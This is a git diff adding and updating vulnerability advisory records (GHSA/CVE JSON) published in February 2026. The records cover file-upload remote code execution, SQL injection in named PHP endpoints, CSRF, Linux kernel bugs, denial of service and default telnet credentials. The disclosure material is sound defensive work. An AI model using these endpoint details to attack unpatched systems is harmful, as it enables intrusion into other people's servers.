"severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json b/advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json new file mode 100644 index 0000000000000..ecca6b38fb478 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8rqj-9226-cwx7", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-70151" + ], + "details": "code-projects Scholars Tracking System 1.0 allows an authenticated attacker to achieve remote code execution via unrestricted file upload. The endpoints update_profile_picture.php and upload_picture.php store uploaded files in a web-accessible uploads/ directory using the original, user-supplied filename without validating the file type or extension. By uploading a PHP file and then requesting it from /uploads/, an attacker can execute arbitrary PHP code as the web server user.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70151" + }, + { + "type": "WEB", + "url": "https://code-projects.org/scholars-tracking-system-in-php-with-source-code" + }, + { + "type": "WEB", + "url": "https://youngkevinn.github.io/posts/CVE-2025-70151-Scholars-FileUpload-RCE" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9pjv-cqr5-4xh7/GHSA-9pjv-cqr5-4xh7.json b/advisories/unreviewed/2026/02/GHSA-9pjv-cqr5-4xh7/GHSA-9pjv-cqr5-4xh7.json new file mode 100644 index 0000000000000..f4c8d9cba9d5b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9pjv-cqr5-4xh7/GHSA-9pjv-cqr5-4xh7.json @@ -0,0 +1,96 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9pjv-cqr5-4xh7", + "modified": "2026-02-18T18:30:41Z", + "published": "2026-02-18T18:30:41Z", + "aliases": [ + "CVE-2026-2658" + ], + "details": "A vulnerability was found in newbee-ltd newbee-mall up to a069069b07027613bf0e7f571736be86f431faee. Affected is an unknown function of the component Multiple Endpoints. Performing a manipulation results in cross-site request forgery. Remote exploitation of the attack is possible. The exploit has been made public and could be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2658" + }, + { + "type": "WEB", + "url": "https://github.com/newbee-ltd/newbee-mall/issues/106" + }, + { + "type": "WEB", + "url": "https://github.com/newbee-ltd/newbee-mall/issues/107" + }, + { + "type": "WEB", + "url": "https://github.com/newbee-ltd/newbee-mall" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346456" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346456" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752797" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752798" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752799" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752800" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752801" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752802" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752803" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752804" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752805" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752806" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9wwr-2jh3-482p/GHSA-9wwr-2jh3-482p.json b/advisories/unreviewed/2026/02/GHSA-9wwr-2jh3-482p/GHSA-9wwr-2jh3-482p.json new file mode 100644 index 0000000000000..8a83d4beed92d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9wwr-2jh3-482p/GHSA-9wwr-2jh3-482p.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9wwr-2jh3-482p", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23220" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: fix infinite loop caused by next_smb2_rcv_hdr_off reset in error paths\n\nThe problem occurs when a signed request fails smb2 signature verification\ncheck. In __process_request(), if check_sign_req() returns an error,\nset_smb2_rsp_status(work, STATUS_ACCESS_DENIED) is called.\nset_smb2_rsp_status() set work->next_smb2_rcv_hdr_off as zero. By resetting\nnext_smb2_rcv_hdr_off to zero, the pointer to the next command in the chain\nis lost. Consequently, is_chained_smb2_message() continues to point to\nthe same request header instead of advancing. If the header's NextCommand\nfield is non-zero, the function returns true, causing __handle_ksmbd_work()\nto repeatedly process the same failed request in an infinite loop.\nThis results in the kernel log being flooded with \"bad smb2 signature\"\nmessages and high CPU usage.\n\nThis patch fixes the issue by changing the return value from\nSERVER_HANDLER_CONTINUE to SERVER_HANDLER_ABORT. This ensures that\nthe processing loop terminates immediately rather than attempting to\ncontinue from an invalidated offset.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23220" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5accdc5b7f28a81bbc5880ac0b8886e60c86e8c8" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/71b5e7c528315ca360a1825a4ad2f8ae48c5dc16" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9135e791ec2709bcf0cda0335535c74762489498" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f7b1c2f5642bbd60b1beef1f3298cbac81eb232c" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-c56r-fcf4-6rp2/GHSA-c56r-fcf4-6rp2.json b/advisories/unreviewed/2026/02/GHSA-c56r-fcf4-6rp2/GHSA-c56r-fcf4-6rp2.json index 56e6e2ccb704d..2b556ed679ad7 100644 --- a/advisories/unreviewed/2026/02/GHSA-c56r-fcf4-6rp2/GHSA-c56r-fcf4-6rp2.json +++ b/advisories/unreviewed/2026/02/GHSA-c56r-fcf4-6rp2/GHSA-c56r-fcf4-6rp2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c56r-fcf4-6rp2", - "modified": "2026-02-17T21:31:14Z", + "modified": "2026-02-18T18:30:35Z", "published": "2026-02-17T21:31:14Z", "aliases": [ "CVE-2026-22769" @@ -19,6 +19,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22769" }, + { + "type": "WEB", + "url": "https://cloud.google.com/blog/topics/threat-intelligence/unc6201-exploiting-dell-recoverpoint-zero-day" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-22769" + }, { "type": "WEB", "url": "https://www.dell.com/support/kbdoc/en-us/000426773/dsa-2026-079" diff --git a/advisories/unreviewed/2026/02/GHSA-chpq-fr33-gp2m/GHSA-chpq-fr33-gp2m.json b/advisories/unreviewed/2026/02/GHSA-chpq-fr33-gp2m/GHSA-chpq-fr33-gp2m.json new file mode 100644 index 0000000000000..d042df595b1e6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-chpq-fr33-gp2m/GHSA-chpq-fr33-gp2m.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-chpq-fr33-gp2m", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-2507" + ], + "details": "When BIG-IP AFM or BIG-IP DDoS is provisioned, undisclosed traffic can cause TMM to terminate.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2507" + }, + { + "type": "WEB", + "url": "https://my.f5.com/manage/s/article/K000160003" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T17:21:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f2fg-5m3g-hqwv/GHSA-f2fg-5m3g-hqwv.json b/advisories/unreviewed/2026/02/GHSA-f2fg-5m3g-hqwv/GHSA-f2fg-5m3g-hqwv.json new file mode 100644 index 0000000000000..9787b8ae1e39c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f2fg-5m3g-hqwv/GHSA-f2fg-5m3g-hqwv.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f2fg-5m3g-hqwv", + "modified": "2026-02-18T18:30:39Z", + "published": "2026-02-18T18:30:39Z", + "aliases": [ + "CVE-2025-65519" + ], + "details": "mayswind ezbookkeeping versions 1.2.0 and earlier contain a critical vulnerability in JSON and XML file import processing. The application fails to validate nesting depth during parsing operations, allowing authenticated attackers to trigger denial of service conditions by uploading deeply nested malicious files. This results in CPU exhaustion, service degradation, or complete service unavailability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65519" + }, + { + "type": "WEB", + "url": "https://github.com/ictrun/EBK-SA-2025-001" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-674" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f5pv-9whq-7mv7/GHSA-f5pv-9whq-7mv7.json b/advisories/unreviewed/2026/02/GHSA-f5pv-9whq-7mv7/GHSA-f5pv-9whq-7mv7.json new file mode 100644 index 0000000000000..02ecb48a96ecf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f5pv-9whq-7mv7/GHSA-f5pv-9whq-7mv7.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f5pv-9whq-7mv7", + "modified": "2026-02-18T18:30:41Z", + "published": "2026-02-18T18:30:41Z", + "aliases": [ + "CVE-2026-20144" + ], + "details": "In Splunk Enterprise versions below 10.2.0, 10.0.2, 9.4.7, 9.3.8, and 9.2.11, and Splunk Cloud Platform versions below 10.2.2510.0, 10.1.2507.11, 10.0.2503.9, and 9.3.2411.120, a user of a Splunk Search Head Cluster (SHC) deployment who holds a role with access to the the Splunk _internal index could view the Security Assertion Markup Language (SAML) configurations for Attribute query requests (AQRs) or Authentication extensions in plain text within the conf.log file, depending on which feature is configured.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20144" + }, + { + "type": "WEB", + "url": "https://advisory.splunk.com/advisories/SVD-2026-0209" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json b/advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json index 19cf6653aedee..2b5fbe79d83f6 100644 --- a/advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json +++ b/advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-f7cx-4c4g-9g59", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-18T18:30:38Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2025-61982" @@ -22,6 +22,10 @@ { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2292" + }, + { + "type": "WEB", + "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2292" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-f7pj-q7w5-89fg/GHSA-f7pj-q7w5-89fg.json b/advisories/unreviewed/2026/02/GHSA-f7pj-q7w5-89fg/GHSA-f7pj-q7w5-89fg.json new file mode 100644 index 0000000000000..8e276b81e5f52 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f7pj-q7w5-89fg/GHSA-f7pj-q7w5-89fg.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f7pj-q7w5-89fg", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-71236" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Validate sp before freeing associated memory\n\nSystem crash with the following signature\n[154563.214890] nvme nvme2: NVME-FC{1}: controller connect complete\n[154564.169363] qla2xxx [0000:b0:00.1]-3002:2: nvme: Sched: Set ZIO exchange threshold to 3.\n[154564.169405] qla2xxx [0000:b0:00.1]-ffffff:2: SET ZIO Activity exchange threshold to 5.\n[154565.539974] qla2xxx [0000:b0:00.1]-5013:2: RSCN database changed – 0078 0080 0000.\n[154565.545744] qla2xxx [0000:b0:00.1]-5013:2: RSCN database changed – 0078 00a0 0000.\n[154565.545857] qla2xxx [0000:b0:00.1]-11a2:2: FEC=enabled (data rate).\n[154565.552760] qla2xxx [0000:b0:00.1]-11a2:2: FEC=enabled (data rate).\n[154565.553079] BUG: kernel NULL pointer dereference, address: 00000000000000f8\n[154565.553080] #PF: supervisor read access in kernel mode\n[154565.553082] #PF: error_code(0x0000) - not-present page\n[154565.553084] PGD 80000010488ab067 P4D 80000010488ab067 PUD 104978a067 PMD 0\n[154565.553089] Oops: 0000 1 PREEMPT SMP PTI\n[154565.553092] CPU: 10 PID: 858 Comm: qla2xxx_2_dpc Kdump: loaded Tainted: G OE ------- --- 5.14.0-503.11.1.el9_5.x86_64 #1\n[154565.553096] Hardware name: HPE Synergy 660 Gen10/Synergy 660 Gen10 Compute Module, BIOS I43 09/30/2024\n[154565.553097] RIP: 0010:qla_fab_async_scan.part.0+0x40b/0x870 [qla2xxx]\n[154565.553141] Code: 00 00 e8 58 a3 ec d4 49 89 e9 ba 12 20 00 00 4c 89 e6 49 c7 c0 00 ee a8 c0 48 c7 c1 66 c0 a9 c0 bf 00 80 00 10 e8 15 69 00 00 <4c> 8b 8d f8 00 00 00 4d 85 c9 74 35 49 8b 84 24 00 19 00 00 48 8b\n[154565.553143] RSP: 0018:ffffb4dbc8aebdd0 EFLAGS: 00010286\n[154565.553145] RAX: 0000000000000000 RBX: ffff8ec2cf0908d0 RCX: 0000000000000002\n[154565.553147] RDX: 0000000000000000 RSI: ffffffffc0a9c896 RDI: ffffb4dbc8aebd47\n[154565.553148] RBP: 0000000000000000 R08: ffffb4dbc8aebd45 R09: 0000000000ffff0a\n[154565.553150] R10: 0000000000000000 R11: 000000000000000f R12: ffff8ec2cf0908d0\n[154565.553151] R13: ffff8ec2cf090900 R14: 0000000000000102 R15: ffff8ec2cf084000\n[154565.553152] FS: 0000000000000000(0000) GS:ffff8ed27f800000(0000) knlGS:0000000000000000\n[154565.553154] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[154565.553155] CR2: 00000000000000f8 CR3: 000000113ae0a005 CR4: 00000000007706f0\n[154565.553157] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[154565.553158] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[154565.553159] PKRU: 55555554\n[154565.553160] Call Trace:\n[154565.553162] \n[154565.553165] ? show_trace_log_lvl+0x1c4/0x2df\n[154565.553172] ? show_trace_log_lvl+0x1c4/0x2df\n[154565.553177] ? qla_fab_async_scan.part.0+0x40b/0x870 [qla2xxx]\n[154565.553215] ? __die_body.cold+0x8/0xd\n[154565.553218] ? page_fault_oops+0x134/0x170\n[154565.553223] ? snprintf+0x49/0x70\n[154565.553229] ? exc_page_fault+0x62/0x150\n[154565.553238] ? asm_exc_page_fault+0x22/0x30\n\nCheck for sp being non NULL before freeing any associated memory", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71236" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1a9585e4c58d1f1662b3ca46110ed4f583082ce5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/40ae93668226b610edb952c6036f607a61750b57" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/944378ead9a48d5d50e9e3cc85e4cdb911c37ca1" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/949010291bb941d53733ed08a33454254d9afb1b" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fqrv-m9rv-j33j/GHSA-fqrv-m9rv-j33j.json b/advisories/unreviewed/2026/02/GHSA-fqrv-m9rv-j33j/GHSA-fqrv-m9rv-j33j.json new file mode 100644 index 0000000000000..f089e1845901b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fqrv-m9rv-j33j/GHSA-fqrv-m9rv-j33j.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fqrv-m9rv-j33j", + "modified": "2026-02-18T18:30:39Z", + "published": "2026-02-18T18:30:39Z", + "aliases": [ + "CVE-2025-70998" + ], + "details": "UTT HiPER 810 / nv810v4 router firmware v1.5.0-140603 was discovered to contain insecure default credentials for the telnet service, possibly allowing a remote attacker to gain root access via a crafted script.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70998" + }, + { + "type": "WEB", + "url": "https://github.com/cha0yang1/UTT-nv810v4-telnet-backdoor" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1188" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g3vh-wfh4-fp76/GHSA-g3vh-wfh4-fp76.json b/advisories/unreviewed/2026/02/GHSA-g3vh-wfh4-fp76/GHSA-g3vh-wfh4-fp76.json new file mode 100644 index 0000000000000..d0f1a3d713ba5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g3vh-wfh4-fp76/GHSA-g3vh-wfh4-fp76.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g3vh-wfh4-fp76", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23227" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/exynos: vidi: use ctx->lock to protect struct vidi_context member variables related to memory alloc/free\n\nExynos Virtual Display driver performs memory alloc/free operations\nwithout lock protection, which easily causes concurrency problem.\n\nFor example, use-after-free can occur in race scenario like this:\n```\n\tCPU0\t\t\t\tCPU1\t\t\t\tCPU2\n\t----\t\t\t\t----\t\t\t\t----\n vidi_connection_ioctl()\n if (vidi->connection) // true\n drm_edid = drm_edid_alloc(); // alloc drm_edid\n ...\n ctx->raw_edid = drm_edid;\n ...\n\t\t\t\t\t\t\t\tdrm_mode_getconnector()\n\t\t\t\t\t\t\t\t drm_helper_probe_single_connector_modes()\n\t\t\t\t\t\t\t\t vidi_get_modes()\n\t\t\t\t\t\t\t\t if (ctx->raw_edid) // true\n\t\t\t\t\t\t\t\t drm_edid_dup(ctx->raw_edid);\n\t\t\t\t\t\t\t\t if (!drm_edid) // false\n\t\t\t\t\t\t\t\t ...\n\t\t\t\tvidi_connection_ioctl()\n\t\t\t\t if (vidi->connection) // false\n\t\t\t\t drm_edid_free(ctx->raw_edid); // free drm_edid\n\t\t\t\t ...\n\t\t\t\t\t\t\t\t drm_edid_alloc(drm_edid->edid)\n\t\t\t\t\t\t\t\t kmemdup(edid); // UAF!!\n\t\t\t\t\t\t\t\t ...\n```\n\nTo prevent these vulns, at least in vidi_context, member variables related\nto memory alloc/free should be protected with ctx->lock.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23227" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/0cd2c155740dbd00868ac5a8ae5d14cd6b9ed385" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/60b75407c172e1f341a8a5097c5cbc97dbbdd893" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g4wf-v389-9w53/GHSA-g4wf-v389-9w53.json b/advisories/unreviewed/2026/02/GHSA-g4wf-v389-9w53/GHSA-g4wf-v389-9w53.json index f34fed717a9c1..844bd1e2c59c4 100644 --- a/advisories/unreviewed/2026/02/GHSA-g4wf-v389-9w53/GHSA-g4wf-v389-9w53.json +++ b/advisories/unreviewed/2026/02/GHSA-g4wf-v389-9w53/GHSA-g4wf-v389-9w53.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g4wf-v389-9w53", - "modified": "2026-02-03T09:30:28Z", + "modified": "2026-02-18T18:30:22Z", "published": "2026-02-03T09:30:28Z", "aliases": [ "CVE-2026-1591" diff --git a/advisories/unreviewed/2026/02/GHSA-h437-rr98-fx56/GHSA-h437-rr98-fx56.json b/advisories/unreviewed/2026/02/GHSA-h437-rr98-fx56/GHSA-h437-rr98-fx56.json new file mode 100644 index 0000000000000..39c71f21b1a2e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h437-rr98-fx56/GHSA-h437-rr98-fx56.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h437-rr98-fx56", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23223" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nxfs: fix UAF in xchk_btree_check_block_owner\n\nWe cannot dereference bs->cur when trying to determine if bs->cur\naliases bs->sc->sa.{bno,rmap}_cur after the latter has been freed.\nFix this by sampling before type before any freeing could happen.\nThe correct temporal ordering was broken when we removed xfs_btnum_t.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23223" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1d411278dda293a507cb794db7d9ed3511c685c6" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ba5264610423d9653aa36920520902d83841bcfd" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ed82e7949f5cac3058f4100f3cd670531d41a266" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json b/advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json new file mode 100644 index 0000000000000..b92de6f89b751 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hcrc-x9p4-f9jh", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-70152" + ], + "details": "code-projects Community Project Scholars Tracking System 1.0 is vulnerable to SQL Injection in the admin user management endpoints /admin/save_user.php and /admin/update_user.php. These endpoints lack authentication checks and directly concatenate user-supplied POST parameters (firstname, lastname, username, password, user_id) into SQL queries without validation or parameterization.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70152" + }, + { + "type": "WEB", + "url": "https://code-projects.org/scholars-tracking-system-in-php-with-source-code" + }, + { + "type": "WEB", + "url": "https://youngkevinn.github.io/posts/CVE-2025-70152-Scholars-SQLi-Missing-Auth" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hxp3-qj63-m9j9/GHSA-hxp3-qj63-m9j9.json b/advisories/unreviewed/2026/02/GHSA-hxp3-qj63-m9j9/GHSA-hxp3-qj63-m9j9.json index 1ffb44e84eae6..11e3ba70bf164 100644 --- a/advisories/unreviewed/2026/02/GHSA-hxp3-qj63-m9j9/GHSA-hxp3-qj63-m9j9.json +++ b/advisories/unreviewed/2026/02/GHSA-hxp3-qj63-m9j9/GHSA-hxp3-qj63-m9j9.json @@ -33,7 +33,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-400" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-j6h2-wr53-6vcg/GHSA-j6h2-wr53-6vcg.json b/advisories/unreviewed/2026/02/GHSA-j6h2-wr53-6vcg/GHSA-j6h2-wr53-6vcg.json new file mode 100644 index 0000000000000..25b2b77eec1f3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-j6h2-wr53-6vcg/GHSA-j6h2-wr53-6vcg.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j6h2-wr53-6vcg", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23228" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: server: fix leak of active_num_conn in ksmbd_tcp_new_connection()\n\nOn kthread_run() failure in ksmbd_tcp_new_connection(), the transport is\nfreed via free_transport(), which does not decrement active_num_conn,\nleaking this counter.\n\nReplace free_transport() with ksmbd_tcp_disconnect().", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23228" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/599271110c35f6b16e2e4e45b9fbd47ed378c982" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/787769c8cc50416af7b8b1a36e6bcd6aaa7680aa" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/baf664fc90a6139a39a58333e4aaa390c10d45dc" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/cd25e0d809531a67e9dd53b19012d27d2b13425f" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-j87r-wgfm-7fjj/GHSA-j87r-wgfm-7fjj.json 